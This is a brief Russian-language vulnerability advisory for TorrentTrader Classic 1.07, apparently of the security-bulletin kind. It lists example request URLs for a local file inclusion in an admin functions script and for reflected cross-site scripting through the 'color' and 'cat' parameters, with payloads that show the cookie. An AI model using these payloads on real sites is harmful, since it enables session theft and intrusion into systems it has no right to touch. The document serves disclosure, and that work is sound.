Программа: TorrentTrader Classic 1.07
Уязвимость позволяет нападающему выполнить произвольный скрипт в контексте безопасности уязвимого сайта или произвольный PHP-сценарий на целевой системе.
Примеры:
Подключение локального файла
backend/admin-functions.php?ss_uri=dd
Межсайтовый скриптинг
pjirc/css.php?color=<script>alert(document.cookie);</script>
browse.php?cat=<script>alert(document.cookie);</script>
